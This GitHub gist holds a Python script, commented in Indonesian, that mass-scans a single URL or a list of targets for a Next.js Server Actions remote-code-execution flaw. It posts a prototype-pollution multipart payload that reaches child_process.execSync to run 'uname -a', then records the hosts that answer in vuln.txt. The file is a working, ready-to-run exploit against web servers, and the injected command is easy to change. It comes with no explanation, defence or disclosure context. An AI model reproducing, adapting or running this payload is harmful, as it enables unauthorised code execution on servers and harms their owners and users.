Created
January 14, 2026 00:21
-
-
Save spynika/2ade0eea9b8dcb7ef22e8f78fb222878 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| import argparse | |
| from colorama import init, Fore, Style | |
| import re | |
| import sys | |
| init(autoreset=True) | |
| parser = argparse.ArgumentParser(description="Send payload & detect vuln") | |
| parser.add_argument("-u", "--url", help="Single target URL") | |
| parser.add_argument("-l", "--list", help="List of targets (one per line)") | |
| args = parser.parse_args() | |
| targets = [] | |
| if args.list: | |
| try: | |
| with open(args.list, "r") as f: | |
| raw = [line.strip() for line in f if line.strip()] | |
| targets = list(dict.fromkeys(raw)) | |
| print(Fore.YELLOW + f"[INFO] Unique Target: {len(targets)}" + Style.RESET_ALL) | |
| except: | |
| print(Fore.RED + "[ERR] File list.txt Not Found") | |
| sys.exit(1) | |
| elif args.url: | |
| targets = [args.url.strip()] | |
| else: | |
| print(Fore.RED + "[ERR] Pls Use -u For Single URL OR Use -l For List") | |
| sys.exit(1) | |
| # ================ | |
| # PAYLOAD | |
| # ================ | |
| headers = { | |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Assetnote/1.0.0", | |
| "Next-Action": "x", | |
| "X-Nextjs-Request-Id": "b5dce965", | |
| "X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9" | |
| } | |
| files = { | |
| "0": (None, '''{ | |
| "then": "$1:__proto__:then", | |
| "status": "resolved_model", | |
| "reason": -1, | |
| "value": "{\\"then\\":\\"$B1337\\"}", | |
| "_response": { | |
| "_prefix": "var res=process.mainModule.require('child_process').execSync('uname -a',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", | |
| "_chunks": "$Q2", | |
| "_formData": { | |
| "get": "$1:constructor:constructor" | |
| } | |
| } | |
| }'''), | |
| "1": (None, '"$@0"'), | |
| "2": (None, '[]') | |
| } | |
| pattern = r"(Linux\s+\S+\s+\d+\.\d+\.\S+.*)" | |
| save_file = "vuln.txt" | |
| # Jika ingin file selalu bersih saat dijalankan ulang: | |
| open(save_file, "w").close() | |
| # ================ | |
| # SCAN LOOP | |
| # ================ | |
| for raw_url in targets: | |
| url = raw_url | |
| if not url.startswith("http"): | |
| url = "https://" + url | |
| print(Fore.CYAN + f"\n[+] Testing: {url}" + Style.RESET_ALL) | |
| try: | |
| r = requests.post(url, headers=headers, files=files, timeout=10) | |
| resp = r.text.strip() | |
| except Exception as e: | |
| print(Fore.RED + f"[ERR] ERROR: {e}") | |
| continue | |
| # Cari pola Linux ... #1 SMP di dalam respon | |
| m = re.search(pattern, resp) | |
| if m: | |
| # Mengambil hasil yang cocok dengan pattern | |
| sys_info = m.group(1).strip() | |
| # Membersihkan karakter sisa jika ada (seperti tanda kutip atau penutup JSON) | |
| sys_info = sys_info.split('"')[0].split('\\n')[0].strip() | |
| print(Fore.GREEN + f"[VULN] {sys_info}" + Style.RESET_ALL) | |
| with open(save_file, "a") as f: | |
| f.write(f"{url} => {sys_info}\n") | |
| else: | |
| # Jika output bukan uname -a (misalnya hasil ls -la tadi), maka tidak disimpan | |
| print(Fore.RED + "[NOT VULN / PATTERN MISMATCH]" + Style.RESET_ALL) | |
| print(Fore.YELLOW + f"\n[INFO] Scan Selesai. Hasil disimpan di -> {save_file}" + Style.RESET_ALL) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment